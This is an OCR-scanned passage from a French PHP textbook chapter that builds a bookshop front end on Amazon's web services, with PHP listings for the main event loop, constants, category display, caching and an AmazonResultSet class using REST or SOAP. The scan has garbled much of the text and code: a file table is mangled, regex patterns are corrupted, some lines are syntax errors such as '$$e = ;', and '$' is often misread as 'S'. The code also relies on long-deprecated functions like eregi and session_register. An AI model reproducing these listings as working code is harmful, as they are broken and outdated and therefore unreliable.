ne peut acceder a certaines categories importantes, telle celle des meilleures ventes de 
livres, comme des nceuds de navigation. 

Le bas de notre page d'accueil contient d'autres livres et des liens vers d'autres pages, 
mais vous ne pouvez pas les voir dans la capture d'ecran. Une page n' affiche que 
10 livres par page, mais fournit des liens permettant d'atteindre jusqu'a 30 pages 
supplementaires. Cette valeur de 10 livres par page est fixee par Amazon, tandis que la 
limite de 30 pages est notre propre choix personnel. 

A partir de cette page, les utilisateurs peuvent cliquer pour obtenir des informations 
detaillees sur les livres. Cette nouvelle page est presentee a la Figure 31.2. 



Figure 31.2 

La page des details 
donne plus d'infor- 
mations sur un livre en 
particulier, notamment 
les produits similaires 
et des commentaires. 
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Bien que tout ne tienne pas dans la capture d'ecran, le script montre l'essentiel des 
informations qu' Amazon fournit. Nous avons choisi d'ignorer les parties qui concer- 
ned les produits qui ne sont pas des livres et la liste des categories correspondant a 
ce livre. 

Si l'utilisateur clique sur l'image de couverture, il verra apparaitre une version agrandie 
de cette image. 

Vous avez peut-etre remarque le champ de recherche situe en haut de ces figures. II 
permet d'effectuer une recherche par mot-cle sur le site et dans le catalogue 
d' Amazon via son interface de service web. La Figure 31.3 montre le resultat d'une 
recherche. 



Figure 31.3 

Cette page presente le 
resultat d'une recherche 
sur batman. 
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Bien que ce projet ne montre que quelques categories, les clients peuvent done 
retrouver n'importe quel livre en utilisant cette recherche et en naviguant vers des 
livres particuliers. 

Chaque livre est associe a un lien Add to Cart. En cliquant dessus ou sur le lien Details 
dans le resume du panier, le client peut voir le contenu courant de son panier, comme le 
montre la Figure 3 1 .4. 

Enfm, si un client clique sur l'un des liens Checkout, on envoie les details de son 
panier a Amazon et on le redirige la-bas. II verra alors une page comme celle de la 
Figure 31.5. 
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Figure 31.4 

A partir de la page du 
panier, le client peut 
supprimer des articles, 
vider le panier ou pro- 
ceder a la commande. 
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Figure 31.5 

Avant de mettre les 
articles dans le panier 
d 'Amazon, le systeme 
confirme la transaction 
et montre tous les articles 
du panier de Tahuayo. 
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Vous devriez maintenant comprendre ce que nous entendons par "construire son propre 
frontal en s'appuyant sur Amazon". 
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Ce projet utilisant une approche orientee evenement, l'essentiel de la logique de deci- 
sion de 1' application se trouve dans un seul fichier, index.php. Le Tableau 31.1 resume 
les fichiers utilises par notre application. 



Tableau 31.1 : Fichier de I'application Tahuayo 



No in 


Type 


Description 


index . php 


Application 


Fichier principal de I'application. 


about . php 


Application 


Affiche la page "About". 


UUllo Ldll Lb . fJM|J 


T-7 t c r\ 1 i* inline 
JTldllCI 1111*1 Us 
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glob ales. 
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Pir'riif*!* inline 
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haut de chaque page, ainsi que la CSS. 
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pages. 
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d'une requete Amazon. 
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informations sur un livre. 


bookdisplayf unctions . php 


Fonctions 


Contient des fonctions utilitaires pour 
l'affichage d'un livre et des listes de livres. 


cachef unctions . php 


Fonctions 


Contient des fonctions pour effectuer la mise 
en cache requise par Amazon. 


cartf unctions . php 


Fonctions 


Contient des fonctions de manipulation du 
panier virtuel. 


cat egoryf unctions . php 


Fonctions 


Contient des fonctions pour obtenir et 
afficher une categoric 


utilityf unctions . php 


Fonctions 


Contient quelques fonctions utilitaires 
necessaires a I'application. 



Vous aurez egalement besoin du fichier nusoap.php mentionne plus haut car il est 
requis par ces fichiers. NuSOAP se trouve sur le site Pearson, www.pearson.fr, dans 
le repertoire chapitre33 , mais vous pouvez verifier s'il n'existe pas une version plus 
recente sur http://sourceforge.net/projects/nusoap/. 

Commencons ce projet par l'etude du fichier principal de I'application, index.php. 
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Coeur de I'application 

Le contenu du fichier central de I'application, index.php, est presente dans le 
Listing 31.3. 

Listing 31.3 : index.php — Le fichier central de I'application 

<?php 

// Nous n'utilisons qu'une seule variable de session 'cart' pour 
// stocker le contenu du panier. 
session_start( ) ; 

require_once( ' constants . php ' ) ; 
require_once( ' Product . php ' ) ; 
require_once( ' AmazonResultSet . php ' ) ; 
require_once( ' utilityf unctions . php ' ) ; 
require_once( ' bookdisplayf unctions . php ' ) ; 
require_once( ' cartf unctions . php ' ) ; 
require_once( ' categoryf unctions . php ' ) ; 

// Voici les variables que nous attendons de l'exterieur. 
// Elles seront validees et converties en variables globales. 
$external = array (' action ' , 'ASIN', 'mode', ' browseNode ' , 
' page ' , ' search ' ) ; 

// Ces variables peuvent arriver par Get ou Post 
// Convertit toutes les variables exterieures en variables 
// globales aux noms courts 
foreach ($external as $e) { 
if (@$_REQUEST[$e] ) { 

$$e = $_REQUEST[$e] ; 
} else { 
$$e = ; 

} 

$$e = trim($$e) ; 

} 

// Valeurs par defaut des variables globales 
if ($mode==' ' ) { 

$mode = 'Books'; // Nous n'avons pas teste les autres modes 

} 

if ($browseNode== ' ' ) { 
$browseNode = 53; // 53 = best-sellers des livres "non fiction" 

} 

if ($page==' ' ) { 

$page =1; // Premiere page - II y a 10 articles par page 

} 

// Valide/decoupe 1' entree 

if ( !eregi( "~[A-Z0-9]+$' , $ASIN)) { 

// Les ASIN doivent etre alphanumeriques . 

$ASIN =' ' ; 

} 

if ( !eregi( IA [a-z]+$' , $mode)) { 
// Le mode doit etre alphabetique 



Chapitre 31 



Connexion a des services web avec XML et SOAP 821 



$mode = ' Books ' ; 

} 

// Les pages et les browseNodes doivent etre des entiers 

$page=intval($page) ; 

$browseNode = intval($browseNode) ; 

// On supprime les caracteres de $search ici afin de pouvoir 
// l'afficher dans les en-tetes. 
$search = safeString($search) ; 

if ( !isset($_SESSION[ 'cart ' ] ) ) { 
session_register( ' cart ' ) ; 
$_SESSION[ 'cart' ] = array (); 

} 

// Taches a effectuer avant l'affichage de la barre du haut if 
($action == 'addtocart') { 
addToCart($_SESSION[ 'cart' ] , $ASIN, $mode); 

} 

if($action == ' deletef romcart ' ) { 
deleteFromCart($_SESSION[ 'cart ' ] , $ASIN) ; 

} 

if($action == 'emptycart') { 
$_SESSION [ ' cart ' ] = array () ; 

} 

// Affichage de la barre du haut 
require_once ( ' topbar . php ' ) ; 

// Boucle de traitement des evenements. Repond aux actions de 1 ' utilisateur 
sur la page d'appel 
switch ($action) { 
case 'detail' : 

showCategories($mode) ; 
showDetail($ASIN, $mode); 
break; 

case ' addtocart ' : 
case ' deletef romcart ' : 
case ' emptycart ' : 
case ' showcart ' : 

echo "<hr /><h1>Your Shopping Cart</h1>"; 

showCart($_SESSION[ 'cart' ] , $mode) ; 
break; 

case ' image ' : 

showCategories($mode) ; 

echo "<h1>Large Product Image</h1>"; 

showImage($ASIN, $mode); 
break; 

case ' search ' : 

showCategories($mode) ; 

echo "<h1>Search Results For " .$search . "</h1>" ; 
showSearch($search, $page, $mode); 
break; 



case 'browsenode 
default : 
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showCategories($mode) ; 

$category = getCategoryName($browseNode) ; 

if ( !$category || ($category== 1 Best Selling Books')) { 

echo "<h1>Current Best Sellers</h1>" ; 
} else { 

echo "<h1>Current Best Sellers in " .$category . "</h1>" ; 

} 

showBrowseNode($browseNode, $page, $mode) ; 
break; 

} 

require (' bottom . php ') ; 

?> 



Le script commence par creer une variable de session pour y stacker le panier virtuel du 
client, comme on l'a deja fait auparavant. 

On inclut ensuite plusieurs fichiers. La plupart seront presentes plus loin, mais nous 
devons evoquer le premier maintenant. Ce fichier, constants. php, defmit des constantes 
et des variables importantes qui seront utilisees tout au long de 1' application. Son 
contenu est presente dans le Listing 3 1 .4. 

Listing 31.4 : constants. php — Declarations de constantes et de variables globales 
essentielles 



<?php 

// Cette application peut se connecter via REST (XML sur HTTP) ou 
// SOAP. 

// Choisissez une seule version de METHOD. 
// define ( 'METHOD' , 'SOAP' ) ; 
define ( 'METHOD' , 'REST'); 

// Cree un repertoire cache qui doit etre accessible en ecriture 
def ine (' CACHE ' , 'cache'); // Chemin des fichiers en cache 

// Mettre ici votre identifiant d'associe 
define ( ' ASSOCIATEID ' , 1 XXXXXXXXXXXXXX ' ) ; 
// Mettre ici votre identifiant developpeur 
define ( 'DEVTAG' , 'XXXXXXXXXXXXXX'); // 

// Produit une erreur si le programme s' execute avec un DEVTAG non 
// modifie 

if ( DEVTAG== ' XXXXXXXXXXXXXX ' ) { 
die ("You need to sign up for an Amazon.com developer tag at 
<a href =\ " https : / /aws . amazon . com/ \ ">Amazon</a> 
when you install this software. You should probably sign 
up for an associate ID at the same time. Edit the file 
constants. php. " ) ; 

} 

// Liste (partielle) des browseNodes d' Amazon. 
ScategoryList = array (5=> ' Computers & Internet', 
3510=>'Web Development', 

295223=> ' PHP ' , 17=> ' Literature and Fiction', 
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3=>' Business & Investing', 
53=> ' Non Fiction ' , 
23=> ' Romance ' , 75=> ' Science ' , 
21 => 1 Reference 1 , 

6 =>'Food & Wine', 27=> ' Travel ' , 
16272=> ' Science Fiction' 

); 



Cette application ay ant ete concue pour utiliser REST ou SOAP, vous pouvez choisir la 
version en modifiant la valeur de la constante METHOD. 

La constante CACHE contient le chemin vers le cache des donnees telechargees a partir 
d'Amazon. Modifiez-la pour qu'elle corresponde a l'emplacement que vous souhaitez 
utiliser sur votre systeme. 

La constante ASSOCIATEID contient l'identinant d'associe. Si vous l'envoyez a Amazon 
en meme temps que vos transactions, vous recevrez une commission. Assurez-vous de 
la modifier. 

La constante DEVTAG contient le jeton developpeur que vous a fourni Amazon lorsque 
vous vous etes inscrit. Si vous ne modifiez pas sa valeur par defaut, 1' application ne 
fonctionnera pas. Vous pouvez demander un jeton a partir de la page https:// 
aws.amazon.com. 

Revenons maintenant a index.php. II contient quelques preliminaires, puis la boucle de 
traitement des evenements. On commence par extraire les variables entrantes a partir du 
tableau superglobal $ REQUEST, qui est fourni par les requetes GET ou POST. Puis on 
configure quelques valeurs par defaut pour certaines variables globales standard qui 
seront affichees plus tard : 

// Valeurs par defaut des variables globales 
if ($mode==' ' ) { 

$mode = 'Books'; // Nous n'avons pas teste les autres modes 

} 

if ($browseNode== ' ' ) { 
$browseNode = 53; // 53 = best-sellers des livres "non fiction" 

} 

if ($page==' ' ) { 
$page =1; // Premiere page - II y a 10 articles par page 

} 

La variable mode est initialisee avec ' Books ' . Amazon reconnait de nombreux autres 
modes (ou types de produits) mais, ici, nous ne nous interesserons qu'aux livres. Modi- 
fier le code de ce chapitre pour qu'il puisse gerer d'autres modes ne devrait cependant 
pas etre trop difficile : la premiere etape de cette amelioration consisterait a reinitialiser 
$mode et il faudrait egalement consulter la documentation d'Amazon pour connaitre les 
autres attributs renvoyes pour les articles qui ne sont pas des livres, puis supprimer le 
langage specifique aux livres de notre interface utilisateur. 
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La variable browseNode precise la categorie de livres que vous voulez afficher. Elle peut 
etre initialisee si l'utilisateur clique sur l'un des liens Selected Categories. Si elle n'est 
pas initialisee - lorsque, par exemple, l'utilisateur entre pour la premiere fois sur le site 
-, elle vaudra done 53 par defaut. Les nceuds de navigation d' Amazon sont simplement 
des entiers qui identifient une categorie. La valeur 53 represente celle des livres qui ne 
sont pas des fictions. 

La variable page indique a Amazon le sous-ensemble du resultat que vous voulez affi- 
cher pour une categorie donnee. La page 1 contient les resultats 1-10, la page 2, les 
resultats 11-20, etc. Amazon fixant le nombre d' articles par page, vous n'avez aucun 
moyen de controler ce nombre. Vous pourriez, bien sur, afficher deux "pages" Amazon, 
voire plus, sur une seule de vos pages, mais 10 est une valeur raisonnable qui ne justifie 
pas qu'on la contourne. 

Ensuite, vous devez arranger les donnees que vous avez recues en entree, qu'elles viennent 
du champ de recherche ou des parametres GET ou POST : 

// Valide/decoupe 1' entree 

if ( !eregi( 1 *[A-Z0-9]+$' , $ASIN)) { 

// Les ASIN doivent etre alphanumeriques . 

$ASIN = ' ' ; 

} 

if ( !eregi( IA [a-z]+$' , $mode)) { 
// Le mode doit etre alphabetique 
$mode = ' Books ' ; 

} 

// Les pages et les browseNodes doivent etre des entiers 

$page=intval($page) ; 

$browseNode = intval($browseNode) ; 

//On supprime les caracteres de $search ici afin de pouvoir 
// 1' afficher dans les en-tetes. 
$search = safeString($search) ; 

II n'y a rien de nouveau dans ce code. La fonction safest ring ( ) definie dans le fichier 
utility f unctions. php supprime simplement les caracteres non alphanumeriques de la 
chaine qui lui a ete passee en parametre a l'aide d'un remplacement par expression 
reguliere. Comme nous avons deja evoque ce traitement auparavant, nous n'y reviendrons 
pas ici. 

La raison principale pour laquelle vous devez valider les donnees fournies a cette appli- 
cation est que vous utilisez ce que saisissent les utilisateurs pour creer des fichiers dans 
le cache. Vous pourriez avoir de serieux problemes si vous autorisiez les utilisateurs a 
inclure . . ou / dans ce qu'ils saisissent. 

Puis il faut configurer le panier virtuel du client, s'il n'en a pas deja un : 

if ( !isset($_SESSI0N[ 'cart 1 ] ) ) { 
session_register( 1 cart ' ) ; 
$_SESSI0N[ 'cart' ] = array (); 

} 
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Vous devez encore realiser quelques operations avant de pouvoir afficher 1' information 
dans la barre du haut de la page (reportez-vous a la Figure 31.1 pour vous rememorer 
l'aspect de cette barre). Dans chaque page, cette barre contient un apercu du panier 
virtuel ; il faut done que la variable de ce panier soit a jour avant que cette information 
ne s'affiche : 

// Taches a effectuer avant l'affichage de la barre du haut 
if($action == 'addtocart') { 
addToCart($_SESSION[ 'cart 1 ] , $ASIN, $mode); 

} 

if($action == ' deletef romcart ' ) { 

deleteFromCart($_SESSION[ 'cart 1 ] , $ASIN) ; 

} 

if($action == ' emptycart ' ) { 
$_SESSI0N[ 'cart' ] = array(); 

} 

Ici, on ajoute ou supprime si necessaire les articles du panier avant de 1' afficher. Nous 
reviendrons sur ces fonctions lorsque nous etudierons le panier virtuel et la commande. 
Si vous voulez consulter leur code maintenant, vous les trouverez dans le fichier 
cartfunctions.php. Nous preferons les abandonner pour l'instant car vous devez d'abord 
comprendre le fonctionnement de l'interface d'Amazon. 

Puis nous incluons le fichier topbar.php, qui contient simplement du HTML, une feuille 
de style et un appel a la fonction ShowSmallCart ( ) (definie dans cartfunctions.php). II 
affiche le petit resume du panier virtuel dans le coin superieur droit des figures. Nous y 
reviendrons lorsque nous presenterons les fonctions du panier. 

Enfm, nous entrons dans la boucle de traitement des evenements. Les actions possibles 
sont presentees dans le Tableau 3 1 .2. 



Tableau 31.2 : Actions possibles dans la boucle de traitement des evenements 



Action 


Description 


browsenode 


Affiche les livres de la categorie indiquee. C'est Taction par defaut. 


detail 


Affiche les details sur un livre particulier. 


image 


Affiche une version agrandie de la couverture du livre. 


search 


Affiche le resultat d'une recherche de l'utilisateur. 


addtocart 


Ajoute un article au panier virtuel de l'utilisateur. 


deletef romcart 


Supprime un article du panier virtuel. 


emptycart 


Vide le panier. 


showcart 


Affiche le contenu du panier. 
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Comme vous pouvez le constater, les quatre premieres actions recuperent et affichent 
des informations provenant d'Amazon, tandis que le second groupe de quatre actions 
s'occupe de gerer le panier virtuel. 

Les actions qui recuperent des donnees d'Amazon fonctionnent toutes de la meme 
maniere. A titre d'exemple, nous allons etudier la recuperation des informations sur les 
livres d'un browsenode (categorie) particulier. 

Affichage des livres d'une categorie 

Le code execute pour Taction browsenode (visualisation d'une categorie) est le 
suivant : 

showCategories($mode) ; 

$category = getCategoryName($browseNode) ; 

if ( !$category || ($category== ' Best Selling Books')) { 

echo "<h1>Current Best Sellers</h1>" ; 
} else { 

echo "<h1>Current Best Sellers in " .$category. "</h1>" ; 

} 

showBrowseNode($browseNode, $page, $mode) ; 

La fonction showCategories ( ) affiche la liste des categories selectionnees que vous 
voyez en haut de la purpart des pages. getCat ego ry Name ( ) renvoie le nom de la catego- 
rie correspondant a un numero de browsenode et la fonction showBrowseNode( ) affiche 
une page presentant les livres de cette categorie. 

Commencons par etudier la fonction showCategories ( ), dont le code est presente dans 
le Listing 31.5. 

Listing 31.5 : La fonction showCategoriesO de categoryfunctions.php — Affiche une liste 
des categories 



// Affiche une liste de depart des categories les plus prisees. 
function showCategories($mode) { 
global ScategoryList; 

echo "<hr/><h2>Selected Categories</h2>" ; 

if ($mode == 'Books' ) { 
asort (ScategoryList) ; 
Scategories = count (ScategoryList) ; 
Scolumns = 4; 

$rows = ceil($categories/$columns) ; 

echo "<table border=\"0\" cellpadding=\ "0\ " cellspacing=\ "0\ " 
width=\"100%\"><tr>" ; 

reset (ScategoryList) ; 

for($col = 0; $col<$columns; $col++) { 
echo "<td width=\" " . (100/$columns) . "%\ " 
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valign=\ "top\ "><ul>" ; 
for($row = 0; $row<$rows; $row++) { 
$category = each($categoryList) ; 
if ($category) { 
$browseNode = $category [ ' key ' ] ; 
$name = $category [' value '] ; 
echo "<li><span class=\ "category\ "> 
<a href =\ "index. php?action=browsenode&browseNode=" 
.$browseNode . " \ ">" .$name. "</a></span></li>" ; 

} 

} 

echo "</ul></td>" ; 

} 

echo "</tr></table><hr/>" ; 

} 

} 



Pour faire correspondre les numeros de noeuds de navigation a des noms de catego- 
ries, cette fonction utilise le tableau categoryList, qui est declare dans le fichier 
constants. php. La fonction trie le tableau et affiche les differentes categories. 

La fonction getCategoryName( ) qui est appelee ensuite dans la boucle de traitement 
des evenements recherche le nom du browsenode en cours de consultation afin que Ton 
puisse afficher un en-tete comme "Current Best Sellers in Business & Investing". Elle 
recherche egalement ce nom dans le tableau categoryList. 

La partie reellement interessante commence avec la fonction showBrowseNode(), 
presentee dans le Listing 31.6. 

Listing 31.6 : La fonction showBrowseNodeQ de bookdisplayf unctions. php — Affiche 
la liste des livres d'une certaine categorie 



// Affiche une page des produits du browsenode indique 
function showBrowseNode($browseNode, $page, $mode) { 
$ars = getARS( ' browse ' , array( ' browsenode ' =>$browseNode , 

'page' => $page, ' mode ' =>$mode) ) ; 
showSummary($ars->products( ) , $page, $ars->totalResults( ) , 
$mode, SbrowseNode) ; 

} 



La fonction showBrowseNode ( ) execute deux traitements. Elle appelle d'abord la fonc- 
tion getARS() du fichier cachefunctions.php, qui obtient et renvoie un objet Amazon 
ResultSet (nous y reviendrons dans un moment). Puis elle appelle la fonction show 
Summary () de bookdisplayf unctions. php pour afficher les informations qu'elle a 
recuperees. 

La fonction getARS( ) est une composante essentielle de 1' application. Si vous parcou- 
rez le code des autres actions - afficher les details, les images, et rechercher -, vous 
constaterez qu'elles l'utilisent toutes. 
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La classe AmazonResultSet 

Etudions plus en detail le code de la fonction getARS ( ) presente dans le Listing 31.7. 

Listing 31.7 : La fonction getARSQ de cachefunctions.php — Renvoie un 
AmazonResultset pour une requete 



// Recupere un AmazonResultSet a partir du cache ou d'une vraie requete. 
Dans ce dernier cas, il est ajoute au cache. 

function getARS($type, $parameters) { 
$cache = cached ($type , $parameters) ; 
if ($cache) { 

// Si on l'a trouve dans le cache 
return Scache; 
} else { 
$ars = new AmazonResultSet; 
if ($type == ' asin ' ) { 

$ars->ASINSearch(padASIN($parameters[ 'asin' ] ) , 
$parameters [ ' mode ' ] ) ; 

} 

if($type == 'browse') { 

$ars->browseNodeSearch ($parameters [ ' browsenode ' ] , 
$parameters [ ' page ' ] , $parameters [ ' mode ' ] ) ; 

} 

if ($type == ' search ' ) { 
$ars->keywordSearch($parameters[ 'search' ] , 
$parameters[ 'page' ] , 
Sparameters [ ' mode ' ] ) ; 

} 

cache($type, Sparameters, $ars); 

} 

return $ars; 

} 



Cette fonction dirige le processus de recuperation des donnees en provenance 
d'Amazon. Elle peut les obtenir de deux facons : a partir du cache ou directement 
aupres d'Amazon. Ce dernier exigeant que les developpeurs mettent en cache les 
donnees qu'ils ont telechargees, cette fonction examine d'abord le cache pour y rechercher 
sa reponse. Nous presenterons le cache un peu plus loin. 

Si cette requete n' a jamais ete effectuee, les donnees de sa reponse doivent etre recupe- 
rees aupres d'Amazon. Pour cela, on cree une instance de la classe AmazonResultSet et 
on lui applique la methode correspondant a cette requete. Le type de la requete est indi- 
que par le parametre $type. Dans notre exemple, on lui passe la valeur browse (voir le 
Listing 31.6) car on veut parcourir une categorie. Si vous vouliez lancer une requete sur 
un livre particulier, il faudrait passer la valeur asin et, pour une recherche par mot-cle, 
la valeur search. 
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Chacune de ces valeurs provoque l'appel d'une methode particuliere de AmazonResult 
Set. La recherche d'un article precis appelle la methode ASINSearch ( ), le parcours 
d'une categorie, la methode browseNodeSearch ( ) et la recherche par mot-cle, la 
methode keywordSearch ( ). 

Etudions de plus pres la classe AmazonResultSet, dont le code est presente dans 
Listing 31.8. 

Listing 31.8 : AmazonResultSet.php — Classe pour gerer les connexions avec Amazon 



<?php 

// Vous pouvez choisir entre REST et SOAP en utilisant cette 
// constante configuree dans constants . php 
if (METHOD=='SOAP' ) { 

include_once( 1 nu soap/ lib /nu soap. php ' ) ; 

} 

// Cette classe stocke le resultat de requetes 

// Generalement , il s'agit de 1 a 10 instances de la classe 

// Product 

class AmazonResultSet { 
private $browseNode; 
private $page; 
private $mode; 
private $url; 
private $type; 
private StotalResults; 
private $currentProduct = null; 

private $products = array(); // Tableau d'objets Product 

function products() { 
return $this->products ; 

} 

function totalResults ( ) { 
return $this->totalResults ; 

} 

function getProduct ($i) { 

if (isset($this->products[$i] ) ) { 

return $this->products [$i] ; 
} else { 
return false; 

} 

} 

// Effectue une requete pour obtenir une page remplie par les produits 
d'un noeud de navigation 

// Choisissez entre XML/HTTP et SOAP dans constants. php 
// Renvoie un tableau de Product 

function browseNodeSearch($browseNode, $page, $mode) { 

$this->Service = "AWSECommerceService " ; 
$this->Operation = " ItemSearch " ; 



830 Partie V 



Creer des projets avec PHP et MySQL 



$this->AWSAccessKeyId = DEVTAG; 
$this->AssociateTag = ASSOCIATEID; 
$this->BrowseNode = $browseNode; 
$this->ResponseGroup = "Large"; 
$this->SearchIndex= $mode; 
$this->Sort= 'salesrank 1 ; 
$this->TotalPages= $page; 

if (METHOD=='SOAP' ) { 

$soapclient = new nusoap_client( 
' http : / /ecs . amazonaws . com/AWSECommerceService/ 
AWSECommerceService .wsdl ' , 
'wsdl ' ) ; 

$soap_proxy = $soapclient->getProxy ( ) ; 

$request = array ('Service' => $this->Service , 

'Operation' => $this->Operation , 

'BrowseNode' => $this->BrowseNode, 

' ResponseGroup ' => $this->ResponseGroup, 

' Searchlndex ' => $this->SearchIndex, 

'Sort' => $this->Sort, 

'TotalPages' => $this->TotalPages) ; 

$parameters = array ( 1 AWSAccessKey Id ' => DEVTAG, 

1 AssociateTag ' => ASSOCIATEID, 'Request l= >array($request) ) ; 

// Effectue la veritable requete soap 

Sresult = $soap_proxy->ItemSearch($parameters) ; 

if (isSOAPError($result) ) { 
return false; 

} 

$this->totalResults = $result [ ' TotalResults ' ] ; 

f oreach($result[ ' Items '][' Item ' ] as $product) { 
$this->products[ ] = new Product (Sproduct) ; 

} 

unset($soapclient) ; 
unset ($soap_proxy ) ; 

} else { 

// Cree l'URL et appelle parseXML pour la telecharger et 
// l'analyser 

$this->url = "http://ecs.amazonaws.com/onca/xml?". 
"Service^" . $this->Service . 
"&Operation=" . $this->Operation . 
"&AssociateTag=" .$this->AssociateTag . 
"&AWSAccessKeyId=" .$this->AWSAccessKeyId . 
"&BrowseNode=" . $this->BrowseNode . 
"&ResponseGroup=" .$this->ResponseGroup . 
"&SearchIndex=" .$this->SearchIndex. 
"&Sort=" .$this->Sort. 
"&TotalPages= " . $this->TotalPages ; 
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$this->parseXML() ; 

} 

return $this->products ; 

} 

// Recupere une image agrandie a partir d'un ASIN 
// Renvoie une chaine 

function getlmageUrlLarge ($ASIN , $mode) { 
foreach($this->products as $product) { 
if( $product->ASIN( )== $ASIN) { 
return $product->imageURLLarge( ) ; 

} 

} 

// Si non trouvee 

$this->ASINSearch($ASIN, $mode); 

return $this->products (0) ->imageURLLarge ( ) ; 



// Effectue une requete pour obtenir le produit ayant l'ASIN 
// indique. 

// Choisissez entre XML/HTTP et SOAP dans constants . php 

// Renvoie un objet Products 

function ASINSearch ($ASIN , $mode = 'books') { 

$this->type = 'ASIN ' ; 

$this->ASIN=$ASIN; 

$this->mode = $mode; 

$ASIN = padASIN($ASIN) ; 

$this->Service = "AWSECommerceService " ; 
$this->Operation = " ItemLookup" ; 
$this->AWSAccessKeyId = DEVTAG; 
$this->AssociateTag = ASSOCIATEID; 
$this->ResponseGroup = "Large"; 
$this->IdType = "ASIN" ; 
$this->ltemld = $ASIN; 

if (METH0D=='S0AP' ) { 

$soapclient = new nusoapclient ( 
' http : / /ecs . amazonaws . com/AWSECommerceService/ 
AWSECommerceService .wsdl ' , 
'wsdl ' ) ; 

$soap_proxy = $soapclient->getProxy ( ) ; 

$request = array ('Service' => $this->Service , 'Operation' => 
$this->Operation, ' ResponseGroup ' => $this->ResponseGroup, 
'IdType' => $this->IdType, ' Itetnld ' => $this->ltemld) ; 

$parameters = array ( ' AWSAccessKey Id ' => DEVTAG, 

' AssociateTag ' => ASSOCIATEID, 'Request '=>array($request) ) ; 

// Effectue la veritable requete SOAP 

Sresult = $soap_proxy->ItemLookup($parameters) ; 
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if (isSOAPError($result) ) { 
return false; 

} 

$this->products[0] = new Product ($result [' Items '][' Item 1 ]) ; 

$this->totalResults=1 ; 
unset($soapclient) ; 
unset ($soap_proxy) ; 

} else { 

// Cree l'URL et appelle parseXML pour la telecharger et 
// l'analyser 

$this->url = "http://ecs.amazonaws.com/onca/xml?". 
"Service=" . $this->Service . 
"&0peration=" . $this->Operation . 
"&AssociateTag=" .$this->AssociateTag . 
"&AWSAccessKeyId=" .$this->AWSAccessKeyId . 
"&ResponseGroup=" .$this->ResponseGroup . 
"&IdType=" .$this->IdType. 
"&ltemld=" .$this->ltemld; 

$this->parseXML( ) ; 

} 

return $this->products[0] ; 

} 

// Effectue une requete pour obtenir une page de produits avec 
// une recherche par mot-cle. 

// Choisissez entre XML/HTTP et SOAP dans constants . php 
// Renvoie un tableau de Product 

function keywordSearch ($search , $page, $mode = 'Books') { 

$this->Service = "AWSECommerceService " ; 
$this->Operation = " ItemSearch " ; 
$this->AWSAccessKeyId = DEVTAG; 
$this->AssociateTag = ASSOCIATEID; 
$this->ResponseGroup = "Large"; 
$this->SearchIndex= $mode; 
$this->Keywords= $search; 

if (METHOD=='SOAP' ) { 

Ssoapclient = new nusoapclient ( 
' http : / /ecs . amazonaws . com/AWSECommerceService/ 
AWSECommerceService .wsdl ' , 
'wsdl ' ) ; 

$soap_proxy = $soapclient->getProxy ( ) ; 

Srequest = array ('Service' => $this->Service, 

'Operation' => $this->Operation , 
' ResponseGroup ' => $this->ResponseGroup, 
' Searchlndex ' => $this->SearchIndex, 
'Keywords' => $this->Keywords) ; 
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$parameters = array ( ' AWSAccessKey Id ' => DEVTAG, 

' AssociateTag ' => ASSOCIATEID, 'Request l= >array($request) ) ; 

// Effectue la veritable requete SOAP 

$result = $soap_proxy->ItemSearch($parameters) ; 

if (isSOAPError($result) ) { 
return false; 

} 

$this->totalResults = $result[ 'TotalResults 1 ] ; 

foreach($result[ ' Items '][' Item' ] as $product) { 
$this->products[ ] = new Product ($product) ; 

} 

unset($soapclient) ; 
unset ($soap_proxy) ; 

} else { 

$this->url = "http://ecs.amazonaws.com/onca/xml?". 
"Service^" . $this->Service . 
"&Operation=" . $this->Operation . 
"&AssociateTag=" .$this->AssociateTag . 
"&AWSAccessKeyId=" .$this->AWSAccessKeyId . 
"&ResponseGroup=" .$this->ResponseGroup . 
"&SearchIndex=" .$this->SearchIndex. 
"&Keywords=" .$this->Keywords; 



$this->parseXML( ) ; 

} 

return $this->products ; 

} 

// Analyse le XML contenu dans les objets Product 
function parseXML() { 

// Suppression des erreurs car cela echoue 

$xml = @simplexml_load_f ile ($this->url) ; 

if(!$xml) { 

// Essaie une seconde fois au cas ou le serveur est occupe. 
$xml = @simplexml_load_f ile($this->url) ; 
if(!$xml) { 
return false; 

} 

} 

$this->totalResults = (integer)$xml->TotalResults; 
f oreach ($xml->Items->Item as SproductXML) { 
$this->products[ ] = new Product (SproductXML) ; 

} 

} 

} 
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Cette classe fait exactement ce qu'on est en droit d'attendre des classes : elle encapsule 
l'interface vers Amazon dans une jolie boite noire. Dans la classe, on peut choisir 
d'effectuer une connexion via la methode REST ou SOAP. La methode choisie est 
determinee par la valeur de la constante globale METHOD, dermic dans constants. php. 

Revenons a l'exemple du parcours d'une categoric On y utilise la classe AmazonRe 
sultSet de la facon suivante : 

$ars = new AmazonResultSet ; 

$ars->browseNodeSearch ($parameters [ 'browsenode' ] , 

$parameters[ ' page ' ] , 
$parameters [ ' mode ' ] ) ; 

Cette classe n'ayant pas de constructeur, on appelle directement sa methode browseNo 
deSearch ( ) , a qui Ton passe, ici, trois parametres : le numero de browsenode qui nous 
interesse (qui correspond, par exemple, a Business & Investing ou a Computers & Inter- 
net) ; le numero de page, qui correspond aux enregistrements que vous voulez recupe- 
ret et le mode, qui represente le type de marchandise qui vous interesse. Un extrait du 
code de cette methode apparait dans le Listing 31.9. 

Listing 31.9 : Methode browseNodeSearch() — Parcours d'une categorie 



// Effectue une requete pour obtenir une page contenant les produits d'un 
nceud de navigation. 

// Choisissez XML/HTTP ou SOAP dans constants. php 
// Renvoie un tableau de Product 

function browseNodeSearch ($browseNode , $page, $mode) { 

$this->Service = "AWSECommerceService" ; 
$this->Operation = " ItemSearch " ; 
$this->AWSAccessKeyId = DEVTAG; 
$this->AssociateTag = ASSOCIATEID; 
$this->BrowseNode = $browseNode; 
$this->ResponseGroup = "Large"; 
$this->SearchIndex= $mode; 
$this->Sort= "salesrank"; 
$this->TotalPages= $page; 

if (METHOD=='SOAP' ) { 

$soapclient = new nusoap_client( 
' http: / /ecs . amazonaws . com/AWSECommerceService/ 
AWSECommerceService .wsdl ' , 
'wsdl' ) ; 

$soap_proxy = $soapclient->getProxy ( ) ; 

$request = array ('Service' => $this->Service, 

'Operation' => $this->Operation , 
'BrowseNode' => $this->BrowseNode, 
' ResponseGroup ' => $this->ResponseGroup, 
' Searchlndex ' => $this->Search!ndex , 
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'Sort' => $this->Sort, 
'TotalPages' => $this->TotalPages) ; 

$parameters = array ( ' AWSAccessKey Id ' => DEVTAG, 

'AssociateTag ' => ASSOCIATEID, 
